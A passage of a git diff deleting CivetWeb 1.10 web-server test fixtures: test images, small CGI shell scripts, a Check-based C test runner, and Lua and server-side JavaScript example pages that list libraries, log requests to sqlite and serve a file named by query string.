--- a/thirdparty/civetweb-1.10/test/imagetest/58.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/59.png b/thirdparty/civetweb-1.10/test/imagetest/59.png
deleted file mode 100644
index d9041b5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/59.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/60.png b/thirdparty/civetweb-1.10/test/imagetest/60.png
deleted file mode 100644
index 8071819..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/60.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/61.png b/thirdparty/civetweb-1.10/test/imagetest/61.png
deleted file mode 100644
index e539e1b..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/61.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/62.png b/thirdparty/civetweb-1.10/test/imagetest/62.png
deleted file mode 100644
index 7d20d26..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/62.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/63.png b/thirdparty/civetweb-1.10/test/imagetest/63.png
deleted file mode 100644
index 66c7391..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/63.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/64.png b/thirdparty/civetweb-1.10/test/imagetest/64.png
deleted file mode 100644
index 34c4dff..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/64.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/65.png b/thirdparty/civetweb-1.10/test/imagetest/65.png
deleted file mode 100644
index 9dbbb66..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/65.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/66.png b/thirdparty/civetweb-1.10/test/imagetest/66.png
deleted file mode 100644
index 2ced8c3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/66.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/67.png b/thirdparty/civetweb-1.10/test/imagetest/67.png
deleted file mode 100644
index 225a716..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/67.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/68.png b/thirdparty/civetweb-1.10/test/imagetest/68.png
deleted file mode 100644
index 2a10e83..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/68.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/69.png b/thirdparty/civetweb-1.10/test/imagetest/69.png
deleted file mode 100644
index 37288a0..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/69.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/70.png b/thirdparty/civetweb-1.10/test/imagetest/70.png
deleted file mode 100644
index e39da97..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/70.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/71.png b/thirdparty/civetweb-1.10/test/imagetest/71.png
deleted file mode 100644
index 4ea682c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/71.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/72.png b/thirdparty/civetweb-1.10/test/imagetest/72.png
deleted file mode 100644
index ff60546..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/72.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/73.png b/thirdparty/civetweb-1.10/test/imagetest/73.png
deleted file mode 100644
index c97a356..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/73.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/74.png b/thirdparty/civetweb-1.10/test/imagetest/74.png
deleted file mode 100644
index 9786789..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/74.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/75.png b/thirdparty/civetweb-1.10/test/imagetest/75.png
deleted file mode 100644
index c66094e..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/75.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/76.png b/thirdparty/civetweb-1.10/test/imagetest/76.png
deleted file mode 100644
index 2cf1fc9..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/76.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/77.png b/thirdparty/civetweb-1.10/test/imagetest/77.png
deleted file mode 100644
index 80dd704..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/77.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/78.png b/thirdparty/civetweb-1.10/test/imagetest/78.png
deleted file mode 100644
index 110277d..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/78.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/79.png b/thirdparty/civetweb-1.10/test/imagetest/79.png
deleted file mode 100644
index 145d580..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/79.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/80.png b/thirdparty/civetweb-1.10/test/imagetest/80.png
deleted file mode 100644
index 414c12a..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/80.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/81.png b/thirdparty/civetweb-1.10/test/imagetest/81.png
deleted file mode 100644
index acdc06f..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/81.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/82.png b/thirdparty/civetweb-1.10/test/imagetest/82.png
deleted file mode 100644
index 0fa4b88..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/82.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/83.png b/thirdparty/civetweb-1.10/test/imagetest/83.png
deleted file mode 100644
index 26bcb19..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/83.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/84.png b/thirdparty/civetweb-1.10/test/imagetest/84.png
deleted file mode 100644
index 9b883da..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/84.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/85.png b/thirdparty/civetweb-1.10/test/imagetest/85.png
deleted file mode 100644
index 481069e..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/85.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/86.png b/thirdparty/civetweb-1.10/test/imagetest/86.png
deleted file mode 100644
index b1c4c44..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/86.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/87.png b/thirdparty/civetweb-1.10/test/imagetest/87.png
deleted file mode 100644
index 266b2eb..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/87.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/88.png b/thirdparty/civetweb-1.10/test/imagetest/88.png
deleted file mode 100644
index cbcdd26..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/88.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/89.png b/thirdparty/civetweb-1.10/test/imagetest/89.png
deleted file mode 100644
index 90dc196..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/89.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/90.png b/thirdparty/civetweb-1.10/test/imagetest/90.png
deleted file mode 100644
index f7c7994..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/90.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/91.png b/thirdparty/civetweb-1.10/test/imagetest/91.png
deleted file mode 100644
index 756c548..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/91.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/92.png b/thirdparty/civetweb-1.10/test/imagetest/92.png
deleted file mode 100644
index 4c5abd7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/92.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/93.png b/thirdparty/civetweb-1.10/test/imagetest/93.png
deleted file mode 100644
index f6e0660..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/93.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/94.png b/thirdparty/civetweb-1.10/test/imagetest/94.png
deleted file mode 100644
index c5b1ca1..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/94.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/95.png b/thirdparty/civetweb-1.10/test/imagetest/95.png
deleted file mode 100644
index 1a7c3dd..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/95.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/96.png b/thirdparty/civetweb-1.10/test/imagetest/96.png
deleted file mode 100644
index 36b01c3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/96.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/97.png b/thirdparty/civetweb-1.10/test/imagetest/97.png
deleted file mode 100644
index 75ca62c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/97.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/98.png b/thirdparty/civetweb-1.10/test/imagetest/98.png
deleted file mode 100644
index 22094b8..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/98.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/99.png b/thirdparty/civetweb-1.10/test/imagetest/99.png
deleted file mode 100644
index 9a97ff5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/99.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/linux.cgi b/thirdparty/civetweb-1.10/test/linux.cgi
deleted file mode 100755
index f65fc7a..0000000
--- a/thirdparty/civetweb-1.10/test/linux.cgi
+++ /dev/null
@@ -1,9 +0,0 @@
-#!/bin/sh
-
-printf "Content-Type: text/plain\r\n"
-printf "\r\n"
-
-echo "This is a shell script called by CGI:"
-echo
-set
-
diff --git a/thirdparty/civetweb-1.10/test/linux_fail.cgi b/thirdparty/civetweb-1.10/test/linux_fail.cgi
deleted file mode 100644
index 885dff2..0000000
--- a/thirdparty/civetweb-1.10/test/linux_fail.cgi
+++ /dev/null
@@ -1,4 +0,0 @@
-#!/bin/sh
-
->&2 echo "Some error sent to stderr"
-
diff --git a/thirdparty/civetweb-1.10/test/linux_fail_silent.cgi b/thirdparty/civetweb-1.10/test/linux_fail_silent.cgi
deleted file mode 100644
index 0cc08c7..0000000
--- a/thirdparty/civetweb-1.10/test/linux_fail_silent.cgi
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/bin/sh
-
-echo not a complete header
-echo and nothing sent to stderr
-
diff --git a/thirdparty/civetweb-1.10/test/lua_preload_file.lua b/thirdparty/civetweb-1.10/test/lua_preload_file.lua
deleted file mode 100644
index 7761f47..0000000
--- a/thirdparty/civetweb-1.10/test/lua_preload_file.lua
+++ /dev/null
@@ -1,7 +0,0 @@
---[[

-Load this test file by adding  

-  lua_preload_file ./lua_preload_file.lua

-to the civetweb.conf file

-]]

-

-mg.preload = "lua_preload_file successfully loaded"

diff --git a/thirdparty/civetweb-1.10/test/main.c b/thirdparty/civetweb-1.10/test/main.c
deleted file mode 100644
index b6f8796..0000000
--- a/thirdparty/civetweb-1.10/test/main.c
+++ /dev/null
@@ -1,103 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#include "civetweb_check.h"
-#include "shared.h"
-#include "public_func.h"
-#include "public_server.h"
-#include "private.h"
-#include "timertest.h"
-#include "private_exe.h"
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-int
-main(const int argc, char *argv[])
-{
-	// Determine what tests to run
-	const char *suite = NULL;
-	const char *const suite_arg = "--suite=";
-	const size_t suite_arg_size = strlen(suite_arg);
-	const char *test_case = NULL;
-	const char *const test_case_arg = "--test-case=";
-	const size_t test_case_arg_size = strlen(test_case_arg);
-	const char *const test_dir_arg = "--test-dir=";
-	const size_t test_dir_arg_size = strlen(test_dir_arg);
-
-	SRunner *srunner;
-	int number_run = 0;
-	int number_failed = 0;
-
-	int i;
-
-	for (i = 1; i < argc; ++i) {
-		if (0 == strncmp(suite_arg, argv[i], suite_arg_size)
-		    && (strlen(argv[i]) > suite_arg_size)) {
-			suite = &argv[i][suite_arg_size];
-		} else if (0 == strncmp(test_case_arg, argv[i], test_case_arg_size)
-		           && (strlen(argv[i]) > test_case_arg_size)) {
-			test_case = &argv[i][test_case_arg_size];
-		} else if (0 == strncmp(test_dir_arg, argv[i], test_dir_arg_size)
-		           && (strlen(argv[i]) > test_dir_arg_size)) {
-			set_test_directory(&argv[i][test_dir_arg_size]);
-		} else if (0 == strcmp("--help", argv[i])) {
-			printf(
-			    "Usage: %s [options]\n"
-			    "  --suite=Suite            Determines the suite to run\n"
-			    "  --test-case='Test Case'  Determines the test case to run\n"
-			    "  --test-dir='folder/path' The location of the test directory "
-			    "with the \n"
-			    "                           'fixtures' and 'expected\n",
-			    argv[0]);
-			exit(EXIT_SUCCESS);
-		} else {
-			fprintf(stderr, "Invalid argument: %s\n", argv[i]);
-			exit(EXIT_FAILURE);
-		}
-	}
-
-	/* Run up the tests */
-	srunner = srunner_create(make_public_func_suite());
-	srunner_add_suite(srunner, make_public_server_suite());
-	srunner_add_suite(srunner, make_private_suite());
-	srunner_add_suite(srunner, make_private_exe_suite());
-	srunner_add_suite(srunner, make_timertest_suite());
-
-	/* Write test logs to a file */
-	srunner_set_log(srunner, "test.log");
-	srunner_set_xml(srunner, "test.xml");
-
-	/* CK_NORMAL offers not enough diagnosis during setup phase*/
-	srunner_run(srunner, suite, test_case, CK_VERBOSE);
-
-	number_run = srunner_ntests_run(srunner);
-	number_failed = srunner_ntests_failed(srunner);
-	srunner_free(srunner);
-	return (number_failed == 0) && (number_run != 0) ? EXIT_SUCCESS
-	                                                 : EXIT_FAILURE;
-}
diff --git a/thirdparty/civetweb-1.10/test/page.lp b/thirdparty/civetweb-1.10/test/page.lp
deleted file mode 100644
index 3e012e2..0000000
--- a/thirdparty/civetweb-1.10/test/page.lp
+++ /dev/null
@@ -1,71 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is another example of a Lua server page, served by
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-The following features are available:
-<ul>
-<?
-  mg.write("<li>" .. _VERSION .. " server pages</li>")
-  if sqlite3 then
-    mg.write("<li>sqlite3 binding</li>")
-  end
-  if lfs then
-    mg.write("<li>lua file system</li>")
-  end
-?>
-</ul></p>
-<p> Today is <? mg.write(os.date("%A")) ?></p>
-<p> URI is <? mg.write(mg.request_info.uri) ?></p>
-<p> URI is <?=mg.request_info.uri?></p>
-
-<p>Database example:
-<pre>
-<?
-  -- Open database
-  local db = sqlite3.open('requests.db')
-  -- Note that the data base is located in the current working directory
-  -- of the process if no other path is given here.
-
-  -- Setup a trace callback, to show SQL statements we'll be executing.
-  -- db:trace(function(data, sql) mg.write('Executing: ', sql: '\n') end, nil)
-
-  -- Create a table if it is not created already
-  db:exec([[
-    CREATE TABLE IF NOT EXISTS requests (
-      id INTEGER PRIMARY KEY AUTOINCREMENT,
-      timestamp NOT NULL,
-      method NOT NULL,
-      uri NOT NULL,
-      addr
-    );
-  ]])
-
-  -- Add entry about this request
-  local stmt = db:prepare(
-    'INSERT INTO requests VALUES(NULL, datetime("now"), ?, ?, ?);');
-  stmt:bind_values(mg.request_info.request_method,
-                   mg.request_info.uri,
-                   mg.request_info.remote_port)
-  stmt:step()
-  stmt:finalize()
-
-  -- Show all previous records
-  mg.write('Previous requests:\n')
-  stmt = db:prepare('SELECT * FROM requests ORDER BY id DESC;')
-  while stmt:step() == sqlite3.ROW do
-    local v = stmt:get_values()
-    mg.write(v[1] .. ' ' .. v[2] .. ' ' .. v[3] .. ' '
-          .. v[4] .. ' ' .. v[5] .. '\n')
-  end
-
-  -- Close database
-  db:close()
-?>
-</pre></p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page.lua b/thirdparty/civetweb-1.10/test/page.lua
deleted file mode 100644
index 2b5600a..0000000
--- a/thirdparty/civetweb-1.10/test/page.lua
+++ /dev/null
@@ -1,71 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n")
-
-mg.write([[
-<html><body>
-<p>This is another example of a Lua script, creating a web page served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-The following features are available:
-<ul>
-]])
-
-  mg.write("<li>" .. _VERSION .. " server pages</li>")
-  if sqlite3 then
-    mg.write("<li>sqlite3 binding</li>")
-  end
-  if lfs then
-    mg.write("<li>lua file system</li>")
-  end
-
-  
-mg.write("</ul></p>\r\n")
-mg.write("<p> Today is " .. os.date("%A") .. "</p>\r\n")
-mg.write("<p> URI is " .. mg.request_info.uri .. "</p>\r\n")
-
-mg.write("<p>Database example:\r\n<pre>\r\n")
-
-  -- Open database
-  local db = sqlite3.open('requests.db')
-  -- Note that the data base is located in the current working directory
-  -- of the process if no other path is given here.
-
-  -- Setup a trace callback, to show SQL statements we'll be executing.
-  -- db:trace(function(data, sql) mg.write('Executing: ', sql: '\n') end, nil)
-
-  -- Create a table if it is not created already
-  db:exec([[
-    CREATE TABLE IF NOT EXISTS requests (
-      id INTEGER PRIMARY KEY AUTOINCREMENT,
-      timestamp NOT NULL,
-      method NOT NULL,
-      uri NOT NULL,
-      addr
-    );
-  ]])
-
-  -- Add entry about this request
-  local stmt = db:prepare(
-    'INSERT INTO requests VALUES(NULL, datetime("now"), ?, ?, ?);');
-  stmt:bind_values(mg.request_info.request_method,
-                   mg.request_info.uri,
-                   mg.request_info.remote_port)
-  stmt:step()
-  stmt:finalize()
-
-  -- Show all previous records
-  mg.write('Previous requests:\n')
-  stmt = db:prepare('SELECT * FROM requests ORDER BY id DESC;')
-  while stmt:step() == sqlite3.ROW do
-    local v = stmt:get_values()
-    mg.write(v[1] .. ' ' .. v[2] .. ' ' .. v[3] .. ' '
-          .. v[4] .. ' ' .. v[5] .. '\n')
-  end
-
-  -- Close database
-  db:close()
-
-mg.write([[
-</pre>
-</p>
-</body></html>
-]])
diff --git a/thirdparty/civetweb-1.10/test/page.ssjs b/thirdparty/civetweb-1.10/test/page.ssjs
deleted file mode 100644
index d4465a6..0000000
--- a/thirdparty/civetweb-1.10/test/page.ssjs
+++ /dev/null
@@ -1,19 +0,0 @@
-print = conn.write || print

-

-// send a header

-print('HTTP/1.0 200 OK\r\n');

-print('Content-Type: text/html\r\n');

-print('\r\n');

-

-print("<html><body>\n");

-print("<p>This example page is generated by the ");

-print('<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>');

-print(" with server side javascript.</p>\n");

-

-var d = new Date();

-var n = d.toString(); 

-

-print("<p>Server time: " + n + "</p>\n");

-

-print("</body></html>\n");

-

diff --git a/thirdparty/civetweb-1.10/test/page2.lp b/thirdparty/civetweb-1.10/test/page2.lp
deleted file mode 100644
index c98b940..0000000
--- a/thirdparty/civetweb-1.10/test/page2.lp
+++ /dev/null
@@ -1,72 +0,0 @@
-<? mg.write("HTTP/1.0 200 OK") ?>

-<? mg.write("Content-Type: text/html") ?>

-

-<html><body>

-

-<p>This is another example of a Lua server page, served by

-<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>.

-</p><p>

-The following features are available:

-<ul>

-<?

-  -- functions defubed in one Lua tag should still be available in the next one

-  function print_if_available(tab, name)

-    if tab then

-      mg.write("<li>" .. name .. "</li>\n")

-    end

-  end

-

-  function recurse(tab)

-    mg.write("<ul>\n")

-    for k,v in pairs(tab) do

-      if type(v) == "table" then

-        mg.write("<li>" .. tostring(k) .. ":</li>\n")

-        recurse(v)

-      else

-        mg.write("<li>" .. tostring(k) .. " = " .. tostring(v) .. "</li>\n")

-      end

-    end

-    mg.write("</ul>\n")

-  end

-?>

-<?

-  -- Print Lua version and available libraries

-  mg.write("<li>" .. _VERSION .. " with the following standard libraries</li>\n")

-  mg.write("<ul>")

-  libs = {"string", "math", "table", "io", "os", "bit32", "utf8", "package", "coroutine", "debug"};

-  for _,n in ipairs(libs) do

-    print_if_available(_G[n], n);

-  end

-  mg.write("</ul>\n")

-  print_if_available(sqlite3, "sqlite3 binding")

-  print_if_available(lfs,"lua file system")

-

-  -- Print mg library

-  libname = "mg"

-  print_if_available(_G[libname], libname .. " library")

-  recurse(_G[libname])

-

-  -- Print connect function

-  print_if_available(connect, "connect function")

-

-?>

-</ul></p>

-<p> Today is <? mg.write(os.date("%A")) ?>

-

-<p>

-<?

-  -- for k,v in pairs(_G) do mg.write(k, '\n') end

-

-  if lfs then

-    mg.write("Files in " .. lfs.currentdir())

-    mg.write("\n<ul>\n")

-    for f in lfs.dir(".") do

-      mg.write("<li>" .. f .. "</li>\n")

-      local at = lfs.attributes(f);

-      recurse(at)

-    end

-    mg.write("</ul>\n")

-  end

-?>

-</p>

-</body></html>

diff --git a/thirdparty/civetweb-1.10/test/page2.lua b/thirdparty/civetweb-1.10/test/page2.lua
deleted file mode 100644
index 9c4a5b7..0000000
--- a/thirdparty/civetweb-1.10/test/page2.lua
+++ /dev/null
@@ -1,91 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write([[<html><body>

-

-<p>This is another example of a Lua server page, served by

-<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>.

-</p><p>

-The following features are available:

-<ul>

-]])

-

-function print_if_available(tab, name)

-  if tab then

-    mg.write("<li>" .. name .. "</li>\n")

-  end

-end

-

-function recurse(tab, excl)

-  excl = excl or {}

-  mg.write("<ul>\n")

-  for k,v in pairs(tab) do

-    if type(v) == "table" then

-      mg.write("<li>" .. tostring(k) .. ":</li>\n")

-      if excl[v] then

-        -- cyclic

-      else

-        excl[v] = true

-        recurse(v, excl)

-        excl[v] = false

-      end

-    else

-      mg.write("<li>" .. tostring(k) .. " = " .. tostring(v) .. "</li>\n")

-    end

-  end

-  mg.write("</ul>\n")

-end

-

--- Print Lua version and available libraries

-mg.write("<li>" .. _VERSION .. " with the following standard libraries</li>\n")

-mg.write("<ul>\n")

-libs = {"string", "math", "table", "io", "os", "bit32", "utf8", "package", "coroutine", "debug"};

-for _,n in ipairs(libs) do

-  print_if_available(_G[n], n);

-end

-mg.write("</ul>\n")

-print_if_available(sqlite3, "sqlite3 binding")

-print_if_available(lfs, "lua file system")

-

---recurse(_G)

-

--- Print mg library

-libname = "mg"

-print_if_available(_G[libname], libname .. " library")

-recurse(_G[libname])

-

--- Print connect function

-print_if_available(connect, "connect function")

-

--- Get all server options

-mg.write("<li>server options</li>\n")

-recurse(mg.get_option())

-

-mg.write("</ul></p>\n");

-mg.write("<p> Today is " .. os.date("%A") .. "</p>\n");

-

-l = mg.request_info.content_length

-if l then

-  mg.write("<p>Content-Length = "..l..":<br>\n<pre>\n")

-  mg.write(mg.read())

-  mg.write("\n</pre>\n</p>\n")

-end

-

-mg.write("<p>\n");

-

- if lfs then

-  mg.write("Files in " .. lfs.currentdir())

-  mg.write("\n<ul>\n")

-  for f in lfs.dir(".") do

-    local mime = mg.get_mime_type(f)

-    mg.write("<li>" .. f .. " (" .. mime .. ")</li>\n")

-    local at = lfs.attributes(f);

-    recurse(at)

-  end

-  mg.write("</ul>\n")

-end

-

-mg.write([[

-</p>

-</body></html>

-]])

diff --git a/thirdparty/civetweb-1.10/test/page2.ssjs b/thirdparty/civetweb-1.10/test/page2.ssjs
deleted file mode 100644
index 66e0c83..0000000
--- a/thirdparty/civetweb-1.10/test/page2.ssjs
+++ /dev/null
@@ -1,30 +0,0 @@
-conn.write("HTTP/1.0 200 OK\r\n")

-conn.write("Content-Type: text/html\r\n")

-conn.write("\r\n")

-conn.write("<html><body>\r\n")

-conn.write("<p>This is an example of a server side JavaScript, served by the ")

-conn.write('<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.')

-conn.write("</p>\r\n")

-

-

-function print_elements(title, obj)

-{

-  conn.write("<p>\r\n");

-  conn.write("<b>" + title + "</b><br>\r\n");

-  elms = Object.getOwnPropertyNames(obj)

-

-  for (var i = 0; i < elms.length; i++) {

-    conn.write(JSON.stringify(elms[i]) + ":<br>\r\n")

-    conn.write("Type: " + typeof(obj[elms[i]]) + "<br>\r\n")

-    conn.write(JSON.stringify(Object.getOwnPropertyDescriptor(obj, elms[i]))  + "<br>\r\n")

-    conn.write("<br>\r\n")

-  }

-  conn.write('<br></p>\r\n')

-}

-

-

-print_elements("conn", conn)

-print_elements("civetweb", civetweb)

-

-

-conn.write('</body></html>\r\n')

diff --git a/thirdparty/civetweb-1.10/test/page3.lp b/thirdparty/civetweb-1.10/test/page3.lp
deleted file mode 100644
index 8d18b74..0000000
--- a/thirdparty/civetweb-1.10/test/page3.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = string.gsub(mg.script_name, "page3.lp$", "page2.lp")
-  mg.write("Output of " .. script .. ":\n")
-?>
-</p><p>
-<?
-  mg.include(script)
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page3.lua b/thirdparty/civetweb-1.10/test/page3.lua
deleted file mode 100644
index fec6899..0000000
--- a/thirdparty/civetweb-1.10/test/page3.lua
+++ /dev/null
@@ -1,34 +0,0 @@
--- This test checks if a query string has been given.

--- It sends the file identified by the query string.

--- Do not use it in a real server in this way!

-

-if not mg.request_info.query_string then

-    mg.write("HTTP/1.0 200 OK\r\n")

-    mg.write("Connection: close\r\n")

-    mg.write("Content-Type: text/html; charset=utf-8\r\n")

-    mg.write("\r\n")

-    mg.write("<html><head><title>Civetweb Lua script test page 3</title></head>\r\n")

-    mg.write("<body>No query string!</body></html>\r\n")

-elseif mg.request_info.query_string:match("/") or mg.request_info.query_string:match("\\") then

-    mg.write("HTTP/1.0 403 Forbidden\r\n")

-    mg.write("Connection: close\r\n")

-    mg.write("Content-Type: text/html; charset=utf-8\r\n")

-    mg.write("\r\n")

-    mg.write("<html><head><title>Civetweb Lua script test page 3</title></head>\r\n")

-    mg.write("<body>No access!</body></html>\r\n")

-else

-    file = mg.get_var(mg.request_info.query_string, "file");

-    if not file then

-        mg.write("HTTP/1.0 400 Bad Request\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html>\r\n<head><title>Civetweb Lua script test page 3</title></head>\r\n")

-        mg.write("<body>\r\nQuery string does not contain a 'file' variable.<br>\r\n")

-        mg.write("Try <a href=\"?file=page3.lua&somevar=something\">?file=page3.lua&somevar=something</a>\r\n")

-        mg.write("</body>\r\n</html>\r\n")

-    else

-        filename = mg.document_root .. "/" .. file

-        mg.send_file(filename)

-    end

-end

diff --git a/thirdparty/civetweb-1.10/test/page3.ssjs b/thirdparty/civetweb-1.10/test/page3.ssjs
deleted file mode 100644
index 71e55e3..0000000
--- a/thirdparty/civetweb-1.10/test/page3.ssjs
+++ /dev/null
@@ -1,61 +0,0 @@
-print = conn.write || print
-
-opts = [
-"cgi_pattern",
-"cgi_environment",
-"put_delete_auth_file",
-"cgi_interpreter",
-"protect_uri",
-"authentication_domain",
-"ssi_pattern",
-"throttle",
-"access_log_file",
-"enable_directory_listing",
-"error_log_file",
-"global_auth_file",
-"index_files",
-"enable_keep_alive",
-"access_control_list",
-"extra_mime_types",
-"listening_ports",
-"document_root",
-"ssl_certificate",
-"num_threads",
-"run_as_user",
